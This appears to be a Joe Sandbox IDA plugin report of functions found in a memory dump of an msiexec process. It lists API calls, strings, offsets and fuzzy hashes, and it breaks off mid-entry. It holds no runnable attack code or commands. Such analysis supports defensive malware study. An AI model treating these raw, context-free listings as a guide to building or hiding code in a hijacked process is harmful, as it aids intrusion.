                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$ErrorLastLockUnlockmemset
                                                                                            • String ID:
                                                                                            • API String ID: 3727323765-0
                                                                                            • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                            • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                            • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                            • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040F673
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                            • strlen.MSVCRT ref: 0040F6A2
                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2754987064-0
                                                                                            • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                            • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040F6E2
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                            • strlen.MSVCRT ref: 0040F70D
                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2754987064-0
                                                                                            • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                            • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                            • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                            • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00402FD7
                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                            • strlen.MSVCRT ref: 00403006
                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2754987064-0
                                                                                            • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                            • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                            • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                            • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$CloseHandle
                                                                                            • String ID: General
                                                                                            • API String ID: 3722638380-26480598
                                                                                            • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                            • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                            • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                            • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                            APIs
                                                                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                            • String ID:
                                                                                            • API String ID: 764393265-0
                                                                                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                            APIs
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$System$File$LocalSpecific
                                                                                            • String ID:
                                                                                            • API String ID: 979780441-0
                                                                                            • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                            • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                            • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                            • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$DialogHandleModuleParam
                                                                                            • String ID:
                                                                                            • API String ID: 1386444988-0
                                                                                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                            • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                            • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                            • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                            • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: InvalidateMessageRectSend
                                                                                            • String ID: d=E
                                                                                            • API String ID: 909852535-3703654223
                                                                                            • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                            • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                            • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                            • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                            APIs
                                                                                            • wcschr.MSVCRT ref: 0040F79E
                                                                                            • wcschr.MSVCRT ref: 0040F7AC
                                                                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcschr$memcpywcslen
                                                                                            • String ID: "
                                                                                            • API String ID: 1983396471-123907689
                                                                                            • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                            • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                            • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                            • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                            APIs
                                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                            • _memicmp.MSVCRT ref: 0040C00D
                                                                                            • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer_memicmpmemcpy
                                                                                            • String ID: URL
                                                                                            • API String ID: 2108176848-3574463123
                                                                                            • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                            • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                            • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                            • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                            APIs
                                                                                            • _snwprintf.MSVCRT ref: 0040A398
                                                                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfmemcpy
                                                                                            • String ID: %2.2X
                                                                                            • API String ID: 2789212964-323797159
                                                                                            • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                            • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintf
                                                                                            • String ID: %%-%d.%ds
                                                                                            • API String ID: 3988819677-2008345750
                                                                                            • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                            • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040E770
                                                                                            • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendmemset
                                                                                            • String ID: F^@
                                                                                            • API String ID: 568519121-3652327722
                                                                                            • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                            • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                            • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                            • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: PlacementWindowmemset
                                                                                            • String ID: WinPos
                                                                                            • API String ID: 4036792311-2823255486
                                                                                            • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                            • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                            • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@DeleteObject
                                                                                            • String ID: r!A
                                                                                            • API String ID: 1103273653-628097481
                                                                                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                            APIs
                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                            • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                            • wcscat.MSVCRT ref: 0040DCFF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileModuleNamewcscatwcsrchr
                                                                                            • String ID: _lng.ini
                                                                                            • API String ID: 383090722-1948609170
                                                                                            • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                            • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                            • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                            • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                            • API String ID: 2773794195-880857682
                                                                                            • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                            • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                            • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                            • memset.MSVCRT ref: 0042BAAE
                                                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID:
                                                                                            • API String ID: 438689982-0
                                                                                            • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                            • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                            APIs
                                                                                              • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$memset
                                                                                            • String ID:
                                                                                            • API String ID: 1860491036-0
                                                                                            • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                            • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                            APIs
                                                                                            • wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                            • free.MSVCRT ref: 0040A908
                                                                                            • free.MSVCRT ref: 0040A92B
                                                                                            • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$memcpy$mallocwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 726966127-0
                                                                                            • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                            • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                            APIs
                                                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                                                            • free.MSVCRT ref: 0040B201
                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                            • free.MSVCRT ref: 0040B224
                                                                                            • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$memcpy$mallocwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 726966127-0
                                                                                            • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                            • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                            APIs
                                                                                            • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                              • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                            • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                            • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                            • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp$memcpy
                                                                                            • String ID:
                                                                                            • API String ID: 231171946-0
                                                                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
